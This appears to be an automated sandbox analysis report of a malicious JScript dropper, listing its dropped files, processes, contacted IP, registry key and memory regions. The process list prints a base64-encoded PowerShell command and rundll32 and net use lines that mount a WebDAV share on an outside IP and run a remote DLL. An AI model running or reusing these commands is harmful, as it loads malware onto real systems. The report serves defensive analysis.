Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
282603115478845855.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrdwjkfg.4hy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slqykihd.cja.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\282603115478845855.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4AOAAyAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwA7ADsAOwA7ADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4AOAAyAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADcANwAyADgAMQA3ADUANwAxADgAOQAzADUALgBkAGwAbAAsAEUAbgB0AHIAeQA=
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\94.159.113.82@8888\davwwwroot\17728175718935.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\94.159.113.82@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://94.159.113.82:8888/I:
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://94.159.113.82:8888/
|
unknown
|
||
|
http://94.159.113.82:8888/sm
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.82
|
unknown
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1FC77F6F000
|
heap
|
page read and write
|
||
|
1FC77F21000
|
heap
|
page read and write
|
||
|
2A35C61F000
|
heap
|
page read and write
|
||
|
F08FDFE000
|
stack
|
page read and write
|
||
|
1FC77F66000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F5A000
|
heap
|
page read and write
|
||
|
F08FFBE000
|
stack
|
page read and write
|
||
|
1FC77F46000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
22CD6F00000
|
remote allocation
|
page read and write
|
||
|
1FC77F70000
|
heap
|
page read and write
|
||
|
FD389FE000
|
stack
|
page read and write
|
||
|
1FC78090000
|
heap
|
page read and write
|
||
|
2A342737000
|
heap
|
page read and write
|
||
|
214BD80B000
|
heap
|
page read and write
|
||
|
2A344AA6000
|
trusted library allocation
|
page read and write
|
||
|
F09023E000
|
stack
|
page read and write
|
||
|
2A3445C1000
|
trusted library allocation
|
page read and write
|
||
|
2A3545B0000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F4F000
|
heap
|
page read and write
|
||
|
2A34463B000
|
trusted library allocation
|
page read and write
|
||
|
F08FF79000
|
stack
|
page read and write
|
||
|
214BF220000
|
heap
|
page read and write
|
||
|
1FC78DA3000
|
heap
|
page read and write
|
||
|
1FC77F24000
|
heap
|
page read and write
|
||
|
2A34460C000
|
trusted library allocation
|
page read and write
|
||
|
1FC76420000
|
heap
|
page read and write
|
||
|
2A342915000
|
heap
|
page read and write
|
||
|
1FC77F46000
|
heap
|
page read and write
|
||
|
F08FE7E000
|
stack
|
page read and write
|
||
|
22CD6FC0000
|
heap
|
page read and write
|
||
|
22CD6FA4000
|
heap
|
page read and write
|
||
|
1FC77F27000
|
heap
|
page read and write
|
||
|
FD3897E000
|
stack
|
page read and write
|
||
|
2A344ADE000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F37000
|
heap
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F53000
|
heap
|
page read and write
|
||
|
7FFD9B5D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC765C2000
|
heap
|
page read and write
|
||
|
214BDA70000
|
heap
|
page read and write
|
||
|
2A3445BB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
1FC78A71000
|
heap
|
page read and write
|
||
|
22CD6FCB000
|
heap
|
page read and write
|
||
|
1FC77F46000
|
heap
|
page read and write
|
||
|
22CD6F68000
|
heap
|
page read and write
|
||
|
1FC77F46000
|
heap
|
page read and write
|
||
|
2A35C7E0000
|
heap
|
page read and write
|
||
|
7DF4BCC60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC77F5A000
|
heap
|
page read and write
|
||
|
1FC788CB000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
A2B15FF000
|
stack
|
page read and write
|
||
|
1FC77F2E000
|
heap
|
page read and write
|
||
|
1FC7677C000
|
heap
|
page read and write
|
||
|
214BD7D0000
|
heap
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
|
22CD6FA4000
|
heap
|
page read and write
|
||
|
1FC77F5A000
|
heap
|
page read and write
|
||
|
7FFD9B7B2000
|
trusted library allocation
|
page read and write
|
||
|
A2B16FE000
|
stack
|
page read and write
|
||
|
214BD80B000
|
heap
|
page read and write
|
||
|
2A342880000
|
heap
|
page read and write
|
||
|
1FC77F36000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A3545A1000
|
trusted library allocation
|
page read and write
|
||
|
22CD6E90000
|
heap
|
page read and write
|
||
|
F0900B8000
|
stack
|
page read and write
|
||
|
2A35C8E0000
|
heap
|
page execute and read and write
|
||
|
1FC77F62000
|
heap
|
page read and write
|
||
|
2A342640000
|
heap
|
page read and write
|
||
|
214BD807000
|
heap
|
page read and write
|
||
|
1FC77F27000
|
heap
|
page read and write
|
||
|
2A3445A1000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F2F000
|
heap
|
page read and write
|
||
|
2A3426B0000
|
heap
|
page read and write
|
||
|
2A35C6E7000
|
heap
|
page read and write
|
||
|
1FC77F5D000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
2A35C800000
|
heap
|
page read and write
|
||
|
F08FEFE000
|
stack
|
page read and write
|
||
|
22CD6FB8000
|
heap
|
page read and write
|
||
|
1FC77F33000
|
heap
|
page read and write
|
||
|
2A34273B000
|
heap
|
page read and write
|
||
|
F0901BE000
|
stack
|
page read and write
|
||
|
1FC77F2E000
|
heap
|
page read and write
|
||
|
2A354610000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F5C000
|
heap
|
page read and write
|
||
|
22CD6F60000
|
heap
|
page read and write
|
||
|
7FFD9B5D4000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F67000
|
heap
|
page read and write
|
||
|
1FC77F6F000
|
heap
|
page read and write
|
||
|
1FC77F74000
|
heap
|
page read and write
|
||
|
1FC76340000
|
heap
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5975F8F000
|
stack
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
F08FCFE000
|
stack
|
page read and write
|
||
|
2A35C942000
|
heap
|
page read and write
|
||
|
2A3428B0000
|
heap
|
page read and write
|
||
|
1FC77F70000
|
heap
|
page read and write
|
||
|
2A344A4A000
|
trusted library allocation
|
page read and write
|
||
|
2A3426B9000
|
heap
|
page read and write
|
||
|
1FC77F2E000
|
heap
|
page read and write
|
||
|
2A35C61C000
|
heap
|
page read and write
|
||
|
2A35CC70000
|
heap
|
page read and write
|
||
|
1FC76560000
|
heap
|
page read and write
|
||
|
2A342660000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F67000
|
heap
|
page read and write
|
||
|
1FC77F3B000
|
heap
|
page read and write
|
||
|
2A344A28000
|
trusted library allocation
|
page read and write
|
||
|
214C0A93000
|
heap
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
214BDA75000
|
heap
|
page read and write
|
||
|
2A3446FD000
|
trusted library allocation
|
page read and write
|
||
|
1FC7677C000
|
heap
|
page read and write
|
||
|
1FC7657D000
|
heap
|
page read and write
|
||
|
2A35C6B1000
|
heap
|
page read and write
|
||
|
2A3426F2000
|
heap
|
page read and write
|
||
|
1FC77F36000
|
heap
|
page read and write
|
||
|
1FC76440000
|
heap
|
page read and write
|
||
|
1FC77F20000
|
heap
|
page read and write
|
||
|
1FC788CF000
|
heap
|
page read and write
|
||
|
2A3428C0000
|
trusted library allocation
|
page read and write
|
||
|
214BD838000
|
heap
|
page read and write
|
||
|
A2B14FE000
|
stack
|
page read and write
|
||
|
214BDA7B000
|
heap
|
page read and write
|
||
|
1FC78588000
|
heap
|
page read and write
|
||
|
214C0A90000
|
heap
|
page read and write
|
||
|
2A3426C3000
|
heap
|
page read and write
|
||
|
1FC77F2B000
|
heap
|
page read and write
|
||
|
22CD6FCB000
|
heap
|
page read and write
|
||
|
F08FC7E000
|
stack
|
page read and write
|
||
|
22CD6FCB000
|
heap
|
page read and write
|
||
|
1FC76595000
|
heap
|
page read and write
|
||
|
2A3426F8000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
22CD6EB0000
|
heap
|
page read and write
|
||
|
214BD80F000
|
heap
|
page read and write
|
||
|
214BD825000
|
heap
|
page read and write
|
||
|
2A342735000
|
heap
|
page read and write
|
||
|
2A34270E000
|
heap
|
page read and write
|
||
|
2A342630000
|
heap
|
page read and write
|
||
|
22CD6F8C000
|
heap
|
page read and write
|
||
|
1FC77F6B000
|
heap
|
page read and write
|
||
|
1FC77F3F000
|
heap
|
page read and write
|
||
|
2A3446B1000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F3F000
|
heap
|
page read and write
|
||
|
1FC7677B000
|
heap
|
page read and write
|
||
|
7FFD9B68C000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CD6DB0000
|
heap
|
page read and write
|
||
|
1FC77F2B000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F5B000
|
heap
|
page read and write
|
||
|
2A3428B5000
|
heap
|
page read and write
|
||
|
7FFD9B5DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC77F21000
|
heap
|
page read and write
|
||
|
1FC77F5A000
|
heap
|
page read and write
|
||
|
1FC790D3000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
2A3445ED000
|
trusted library allocation
|
page read and write
|
||
|
59762FE000
|
stack
|
page read and write
|
||
|
F09033E000
|
stack
|
page read and write
|
||
|
1FC7657F000
|
heap
|
page read and write
|
||
|
1FC7677A000
|
heap
|
page read and write
|
||
|
214BD814000
|
heap
|
page read and write
|
||
|
2A3445EA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
F08F9EE000
|
stack
|
page read and write
|
||
|
1FC77F57000
|
heap
|
page read and write
|
||
|
1FC7677A000
|
heap
|
page read and write
|
||
|
7FFD9B781000
|
trusted library allocation
|
page read and write
|
||
|
22CD6F94000
|
heap
|
page read and write
|
||
|
22CD6F00000
|
remote allocation
|
page read and write
|
||
|
214BD6D0000
|
heap
|
page read and write
|
||
|
22CD6F8C000
|
heap
|
page read and write
|
||
|
22CD6FB8000
|
heap
|
page read and write
|
||
|
2A344590000
|
heap
|
page read and write
|
||
|
1FC77F6C000
|
heap
|
page read and write
|
||
|
1FC76770000
|
heap
|
page read and write
|
||
|
22CD6FC4000
|
heap
|
page read and write
|
||
|
2A3446F7000
|
trusted library allocation
|
page read and write
|
||
|
1FC77F46000
|
heap
|
page read and write
|
||
|
1FC77F46000
|
heap
|
page read and write
|
||
|
2A3426F6000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
214BD7FE000
|
heap
|
page read and write
|
||
|
2A344AD8000
|
trusted library allocation
|
page read and write
|
||
|
597627F000
|
stack
|
page read and write
|
||
|
5975F0A000
|
stack
|
page read and write
|
||
|
1FC765C1000
|
heap
|
page read and write
|
||
|
2A344A70000
|
trusted library allocation
|
page read and write
|
||
|
2A35C65C000
|
heap
|
page read and write
|
||
|
2A35C6B4000
|
heap
|
page read and write
|
||
|
F08F963000
|
stack
|
page read and write
|
||
|
1FC76595000
|
heap
|
page read and write
|
||
|
214BD7F0000
|
heap
|
page read and write
|
||
|
2A3446B4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B690000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A3446A4000
|
trusted library allocation
|
page read and write
|
||
|
22CD7210000
|
heap
|
page read and write
|
||
|
214BD810000
|
heap
|
page read and write
|
||
|
1FC77F5A000
|
heap
|
page read and write
|
||
|
1FC76519000
|
heap
|
page read and write
|
||
|
1FC77F22000
|
heap
|
page read and write
|
||
|
22CD6FBE000
|
heap
|
page read and write
|
||
|
214BD7B0000
|
heap
|
page read and write
|
||
|
A2B11FE000
|
stack
|
page read and write
|
||
|
FD3887A000
|
stack
|
page read and write
|
||
|
2A35C6EC000
|
heap
|
page read and write
|
||
|
2A342900000
|
heap
|
page execute and read and write
|
||
|
1FC77F2E000
|
heap
|
page read and write
|
||
|
2A35C600000
|
heap
|
page read and write
|
||
|
2A3428E0000
|
trusted library allocation
|
page read and write
|
||
|
1FC76579000
|
heap
|
page read and write
|
||
|
2A3446B8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B686000
|
trusted library allocation
|
page read and write
|
||
|
1FC78C08000
|
heap
|
page read and write
|
||
|
A2B10FE000
|
stack
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
22CD7215000
|
heap
|
page read and write
|
||
|
2A3426F0000
|
heap
|
page read and write
|
||
|
7FFD9B5D2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
F09013C000
|
stack
|
page read and write
|
||
|
7FFD9B78A000
|
trusted library allocation
|
page read and write
|
||
|
2A35C900000
|
heap
|
page read and write
|
||
|
7FFD9B5EC000
|
trusted library allocation
|
page read and write
|
||
|
22CD6F90000
|
heap
|
page read and write
|
||
|
59763FE000
|
stack
|
page read and write
|
||
|
22CD6F89000
|
heap
|
page read and write
|
||
|
1FC77F4B000
|
heap
|
page read and write
|
||
|
2A3428F0000
|
heap
|
page readonly
|
||
|
214BD81B000
|
heap
|
page read and write
|
||
|
7FFD9B5E0000
|
trusted library allocation
|
page read and write
|
||
|
A2B0D94000
|
stack
|
page read and write
|
||
|
FD388FE000
|
stack
|
page read and write
|
||
|
1FC77F37000
|
heap
|
page read and write
|
||
|
2A3426EE000
|
heap
|
page read and write
|
||
|
214C0F60000
|
trusted library allocation
|
page read and write
|
||
|
2A342910000
|
heap
|
page read and write
|
||
|
1FC77F2F000
|
heap
|
page read and write
|
||
|
1FC77F5A000
|
heap
|
page read and write
|
||
|
F08FD7C000
|
stack
|
page read and write
|
||
|
2A35C777000
|
heap
|
page execute and read and write
|
||
|
214BD820000
|
heap
|
page read and write
|
||
|
1FC77F33000
|
heap
|
page read and write
|
||
|
1FC77F5A000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
1FC7677C000
|
heap
|
page read and write
|
||
|
597637C000
|
stack
|
page read and write
|
||
|
2A35C770000
|
heap
|
page execute and read and write
|
||
|
214BD830000
|
heap
|
page read and write
|
||
|
22CD6F9C000
|
heap
|
page read and write
|
||
|
A2B19FB000
|
stack
|
page read and write
|
||
|
F090037000
|
stack
|
page read and write
|
||
|
22CD6F90000
|
heap
|
page read and write
|
||
|
F0902BE000
|
stack
|
page read and write
|
||
|
1FC76595000
|
heap
|
page read and write
|
||
|
2A344952000
|
trusted library allocation
|
page read and write
|
||
|
1FC7657C000
|
heap
|
page read and write
|
||
|
1FC7677E000
|
heap
|
page read and write
|
||
|
1FC77F62000
|
heap
|
page read and write
|
||
|
1FC77F47000
|
heap
|
page read and write
|
||
|
1FC77F62000
|
heap
|
page read and write
|
||
|
214BD7F8000
|
heap
|
page read and write
|
||
|
7FFD9B680000
|
trusted library allocation
|
page read and write
|
||
|
1FC76775000
|
heap
|
page read and write
|
||
|
2A35C910000
|
heap
|
page read and write
|
||
|
2A35C6BA000
|
heap
|
page read and write
|
||
|
214C0AB0000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
A2B17FE000
|
stack
|
page read and write
|
||
|
F0903BC000
|
stack
|
page read and write
|
||
|
2A344580000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
2A35C65E000
|
heap
|
page read and write
|
||
|
2A35C629000
|
heap
|
page read and write
|
||
|
A2B13FF000
|
stack
|
page read and write
|
||
|
22CD6F00000
|
remote allocation
|
page read and write
|
||
|
22CD6FC5000
|
heap
|
page read and write
|
||
|
1FC76510000
|
heap
|
page read and write
|
There are 279 hidden memdumps, click here to show them.